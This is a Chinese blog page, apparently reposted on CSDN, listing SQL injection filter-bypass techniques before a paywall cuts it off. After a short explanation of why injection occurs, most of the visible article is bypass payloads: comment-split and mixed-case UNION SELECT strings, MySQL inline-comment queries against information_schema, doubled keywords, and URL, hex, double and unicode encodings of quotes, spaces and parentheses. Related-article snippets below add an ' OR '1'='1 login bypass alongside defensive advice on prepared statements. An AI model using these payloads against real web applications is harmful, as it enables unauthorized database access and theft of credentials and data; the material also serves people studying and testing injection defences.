SQL Injection绕过技巧

最新推荐文章于 2023-12-14 12:00:00 发布
最新推荐文章于 2023-12-14 12:00:00 发布
阅读量1.1k 收藏 21
点赞数
文章标签: php 数据库 操作系统
原文链接:http://www.cnblogs.com/joy-nick/p/5774462.html
版权

0x00 sql注入的原因

sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量。

但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。

比如上面的 String sql = "select id,no from user where id=" + id;
我们希望用户输入的 id 的值,仅仅作为一个字符串字面值,传入数据库执行,但是当输入了: 2 or 1=1 时,其中的 or 1=1 并没有作为 where id= 的字面值,而是作为了 sql语句 来执行的。所以其本质是将用户的输入的数据,作为了命令来执行。

0x01 sql注入绕过

1.1 注释符绕过

常用注释符:

//, -- , /**/, #, --+, -- -, ;,%00,--a
UNION /**/ Select /**/user,pwd,from user
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user

1.2 大小写绕过

?id=1+UnIoN/**/SeLeCT

1.3 内联注释绕过

id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -

通常情况下,上面的代码可以绕过过滤器,请注意,我们用的是 Like而不是 =

1.4 双关键字绕过

?id=1+UNIunionON+SeLselectECT+1,2,3–

1.5 编码绕过

如URLEncode编码,ASCII,HEX,unicode编码绕过

or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

十六进制编码

SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))

双重编码绕过

?id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+

一些unicode编码举例:  
单引号:'
%u0027 %u02b9 %u02bc
%u02c8 %u2032
%uff07 %c0%27
%c0%a7 %e0%80%a7
空白:
%u0020 %uff00
%c0%20 %c0%a0 %e0%80%a0
左括号(:
%u0028 %uff08
%c0%28 %c0%a8
%e0%80%a8
右括号):
%u0029 %uff09
%c0%29 %c0%a9
%e0%80%a9

1.6 空格绕过

最低0.47元/天 解锁文章
weixin_34261739
关注
  • 0
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入绕过实战案例
08-31
通过实践,我们可以学习到如何利用不同技巧绕过常见的防御机制,如输入过滤、预编译语句、参数化查询等。 为了防御SQL注入,开发者应遵循以下最佳实践: 1. 使用预编译语句(如PHP的PDO或MySQLi的prepare()函数),...
SQL注入(入门其二——过滤)
qq_43520778的博客
09-06 1270
[toc]SQL注入。
防止SQL注入的四种方案
dehuisun的专栏
09-05 9533
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。SQL案列这个id从请求参数中获取,若参数被拼接为:1001 or 1 = 1此时,数据库的数据都会被清空掉,后果非常严重.
sql注入漏洞
qz362228的博客
08-11 2500
sql注入漏洞原理,类型,防御方式,绕过技巧
SQL注入过滤
qq_33651286的博客
07-07 1832
SQL防注入过滤
sql注入利用union绕过括号过滤
plant1234的博客
04-02 7759
union盲注 当我们在括号被过滤的时候,就不能使用sub(),mid()等多种函数 于是相等union 要想知道uinon的怎么进行盲注,就要了解union 这个给大家看几个mysql的查询语句: 通过这三条语句我们可以看到,我们我利用union将一条数据:1,2,0x69 与查询出来的数据进行降序排序,在排序过程中可以看出用的是ascii码 进行的排序。当我们给的password的ascii值大于admin用户密码的ascii值时,则第一条数据就是我们给的数据。所有就可以判断password的值为
SQL-Injection-cheat-sheet:利用和学习SQL注入的备忘单
02-06
例如,一个简单的登录表单如果没有进行输入检查,攻击者可以输入" ' OR '1'='1 ",这会使查询总是返回真,从而绕过认证。 2. **注入类型**: - **错误注入**:利用数据库错误信息揭示数据库结构和数据。 - **盲...
sql注入式攻击SQLInjection
08-01
攻击者通过在输入字段中插入恶意的SQL代码,以尝试绕过应用程序的安全控制,获取未经授权的数据访问,甚至篡改或删除数据库中的信息。防SQL注入是保护Web应用程序免受此类攻击的关键措施。 1. **理解SQL注入原理**...
SQL_Injection_Payload:SQL注入有效负载列表
01-28
7. **字符编码与转义**:了解如何绕过字符过滤和转义机制是攻击者成功注入的关键。例如,使用十六进制编码或二进制数据。 8. **堆叠查询**:在单个请求中执行多个查询,使得攻击者可以在一次注入中完成更复杂的操作...
SQL注入攻击与防御(第2版)》- SQL Injection Attacks and Defense 英文原版下载
06-06
例如,通过在登录表单中输入`' OR '1'='1`,攻击者可以绕过身份验证,因为这个字符串使得查询总是返回真。书中会详细讲解这些攻击手法,以及如何通过各种技巧来探测和利用这些漏洞。 防御SQL注入的方法包括但不限于...
推荐几个Java项目防止SQL注入的方法
Javaの甘乃迪的博客
10-06 704
Java项目防止SQL注入的几种方案
Web渗透(二)——SQL注入之绕过
最新发布
qq_61562251的博客
12-14 909
在mysql查询可以使用distinct关键词去除查询的重复值,可以利用这点突破waf拦截。在mysql可以使用这里是反引号绕过一些waf拦截,字段可以加反引号或者不加,意义相同。针对后端语言对sql语句注入的过滤,所进行的绕过方法。11、PCRE绕过(运行大量字符)反引号前面不加空格也是可以的。1、关键字内联注释尝试绕所有。10、花括号{}绕过
sql注入常见绕过方法
ljlrookiebird的博客
09-05 3971
sql注入是web安全的常见漏洞,这里总结下常见的绕过姿势,还有其他没总结到了,小伙伴可以留言补充
SQL过滤,防SQL注入
ugo
09-12 434
一般使用#{},但在使用Mybatis的语法写动态排序时,由于#{}会导致参数带上’',所以使用${},但是又怕sql注入的问题,将传入的参数,过滤后再拼接SQL,会更安全一些。
mysql括号被过滤_【每周一题】SQL注入绕过过滤字符
weixin_39839726的博客
02-02 3659
本帖最后由 Net_S 于 2017-5-30 22:13 编辑sql注入的原因sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量。但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。比如上面的 String sql = "select id,no from user where id=" + id;我们希望用户输入的 id 的...
SQL注入遇到过滤,二次注入
qq_61412565的博客
08-13 1047
SQL注入总不能一帆风顺,对面有时候会有一些防御,过安全狗宝塔那些先且不谈,就是过滤注释符号的时候。(新注意到一个知识点,get传参有urf编码,而post没有)应对方法有:因为注释符不起效,所以灵活用or,构造 or '1' ='1,来把后面的’给过滤掉,(但这是知道靶场源码做出来的方式,实战怎么搞呢)。上面一步是默认把字符型数字型测出来了,那么要记得该测列数和回显位了(这里居然忘了该有这步,真是不器用),以前常规的做法是 and order by 1234,这样不停换数字看他报错的嘛。
SQL注入修复、XSS漏洞 过滤器及Cookie劫持攻击
qq_43420577的博客
05-29 825
然后在WEB.XML里面配置。一、解决sql注入问题。三、cookie劫持。
SQL注入绕过之过滤了‘as‘与无列名注入
NLost
06-03 1491
当过滤了as时 当column被过滤的无列名注入 利用sys.schema_auto_increment_columns 新特性
防止SQL注入攻击的10种有效方法
热门推荐
qq_28245087的博客
06-29 3万+
本文介绍了10种防止SQL注入攻击的方法,包括使用参数化查询、输入验证和过滤、存储过程、最小权限原则、ORM框架、准备语句、安全的数据库连接、避免动态拼接SQL语句、使用防火墙和入侵检测系统以及定期更新和维护数据库软件。输入验证和过滤是一种用于确保用户输入数据的安全性和有效性的技术。需要注意的是,具体的代码实现可能因使用的数据库驱动库而有所不同,但核心思想是相同的:使用PreparedStatement来执行参数化查询,将用户输入作为参数传递给查询,而不是直接拼接到查询字符串中,以提高应用程序的安全性。
过滤SQL关键字,防止SQL注入
08-10
对于防止SQL注入,过滤SQL关键字是一种重要的防护措施之一。下面是一些常见的方法: 1. 输入验证:对用户输入进行验证,确保只接受合法的输入。可以使用正则表达式或其他验证机制来检查输入是否符合预期的格式和类型。 2. 参数化查询:使用参数化查询(也称为预编译语句或绑定参数),将用户提供的输入作为参数传递给SQL查询。这样可以防止用户输入被错误地解释为SQL代码。 3. 使用安全的数据库操作API:使用安全的数据库操作API,如使用ORM(对象关系映射)框架或者预编译的语句。 4. 白名单过滤:创建一个白名单,只允许特定的关键字和字符通过过滤器。其他任何不在白名单中的输入都会被拒绝。 5. 输入转义:对特殊字符进行转义,将其转换为它们的转义序列,以确保它们不会被解释为SQL代码。常见的转义方法包括使用转义字符或者使用特定的库函数进行转义。 需要注意的是,过滤SQL关键字只是防止SQL注入的一个方面,还有其他更全面的防护措施需要综合考虑,如权限控制、日志记录和安全审计等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值